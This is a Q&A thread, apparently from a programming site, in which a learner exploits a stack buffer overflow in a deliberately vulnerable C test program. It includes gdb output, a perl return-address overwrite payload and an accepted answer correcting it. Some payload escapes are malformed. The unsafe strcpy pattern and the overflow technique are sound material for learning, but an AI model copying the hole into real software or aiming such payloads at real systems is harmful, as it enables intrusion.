# Writing an exploit for sample-application

Tags: c++, gdb, c, exploit, stack

I understand the principles of exploiting a classical stack-based buffer-overflow, and now I want to practice it. Therefore I wrote the following test-application:

```
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void public(char *args) {
    char buff[12];
    memset(buff, 'B', sizeof(buff));

    strcpy(buff, args);
    printf("\nbuff: [%s] (%p)(%d)\n\n", &buff, buff, sizeof(buff));
}

void secret(void) {
    printf("SECRET\n");
    exit(0);
}

int main(int argc, char *argv[]) {
    int uid;
    uid = getuid();

    // Only when the user is root
    if (uid == 0)
        secret();

    if (argc > 1) {
        public(argv[1]);
    }
    else
        printf("Kein Argument!\n");
}
```

When the user which starts the program is *root*, the method `secret()` is being called, *otherwise*, the method `public(...)` is being called.
I am using debian-gnome x64, so I had to compile it specifically to x86 to get x86-assembly (which I know better than x64).
I compiled the program with gcc: `gcc ret.c -o ret -m32 -g -fno-stack-protector`

---

**Target:**
I want to call the method `secret()` without being a *root-user*. *{To do that I have to overwrite the `R`eturn `I`nstruction `P`ointer (`RIP`) with the address of the function `secret()`}*

**Vulnerability:**
The method `public(...)` copies the program-args with the unsafe `strcpy()` method into the `char-array` **buff**. So it is possible to overwrite data on the stack, when the user starts the program with an *arg > 11*, where *arg* should be the length of the string-arg.

**Required Information:**

- The address of the function `secret()`.
- The address of the first buffer's first element. Due to `ASCII`-Encoding I know that each `char` has a size of `1 byte`, so that the buffer's last element is `12 bytes` ahead the first element.
- The address of the `RIP`, because I have to overwrite it `secret()`s address.
- *OPTIONAL: It also helps to know the address of the `S`afed `F`rame `P`ointer (`SFP`).*

**Methodical approach:**

- Load the program into `gdb`: `gdb -q ret`.
- To get an overview of the full stack-frame of the method `public(...)` I have to set a breakpoint there, where the `function-epilogue` starts. This is at the enclosing brace `}` at line `11`.
- Now I have to run the program with a valid arg: `run A`.
- At the breakpoint, I now want to view the stack-frame.

  ```
  (gdb) info frame 0
  Stack frame at 0xffffd2f0:
   eip = 0x804852d in public (ret.c:11); saved eip = 0x804858c
   called by frame at 0xffffd330
   source language c.
   Arglist at 0xffffd2e8, args: args=0xffffd575 "A"
   Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
   Saved registers:
    ebp at 0xffffd2e8, eip at 0xffffd2ec
  ```

  Because from that I can gather the following information:

  - The `RIP` is located at `0xffffd2ec` and contains the address `0x804858c` which contains the instruction `0x804858c <main+61>: add    $0x10,%esp`.
  - The `SFP` is located at `0xffffd2e8`.
  - Now I need the address, where the `secret()`-function starts:

    (gdb) print secret
    $2 = {void (void)} 0x804852f
- Last, but not least I get the buffer's address:

  ```
  (gdb) print/x &buff
  $4 = 0xffffd2d4
  ```
- To sum it up:

  - `RIP` is at `0xffffd2ec`.
  - `SFP` is at `0xffffd2e8`.
  - `buff` is at `0xffffd2d4`.

This means that I would have to run the program with `0xffffd2ec` - `0xffffd2d4` + `0x04` = `28 bytes` (= `char`s).

So, to exploit it I'd have to run the program with an arg which is `28 bytes` long whereas the last `4 bytes` contain the address of the function `secret()` (and pay attention to little-endian-ordering):

```
(gdb) run `perl -e '{print "A"x24; print "\xec\d2\ff\ff"; }'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/patrick/Projekte/C/I. Stack_Overflow/ret `perl -e '{print "A"x24; print "\xec\d2\ff\ff"; }'`

buff: [AAAAAAAAAAAAAAAAAAAAAAAA�d2
                                  f
                                   f] (0xffffd2b4)(12)


Program received signal SIGSEGV, Segmentation fault.
0x0c3264ec in ?? ()
```

Two questions are rising up:

- Why is it not working. This example is basically from an older book I'm reading. But theoretically it should work so I think....
- Why is between `buff` and the `SFP` a `8-byte` gap? What does this memory-area contain?

**EDIT: [That's](https://drive.google.com/file/d/0BxV4F9km7MRVa0RKOGk5T3c2UVE/view?usp=sharing) a download-link to the binary.**

Comment: It would help if you could provide a link to the binary.

Comment: Thanks that you want to help me! [That's the link](https://drive.google.com/file/d/0BxV4F9km7MRVa0RKOGk5T3c2UVE/view?usp=sharing) to the binary.

Answer (score 5, accepted):

> - Why is it not working. This example is basically from an older book I'm reading. But theoretically it should work so I think....

It's because you're overwriting the return address on the stack with `0xffffd2ec` instead of `0x0804852f` (the latter is the address for `secret()`).

If you thus use `'{print "A"x24; print "\x2f\85\04\08"; }'` instead, it should work.

> - Why is between `buff` and the `SFP` a `8-byte` gap? What does this memory-area contain?

That gap is probably because of attempted optimizations made by gcc. The memory-area contains nothing (well, technically it contains 8 bytes whose values are indeterminate) and the code in the `public()` function neither reads from nor writes to that memory-area.

Comment: Thanks!
You are right, I did not overwrite the `RIP` with `secret()`s address.
But you forgot to reverse the byte-order (it's little-endian).

Comment: Good catch; just fixed the byte-order.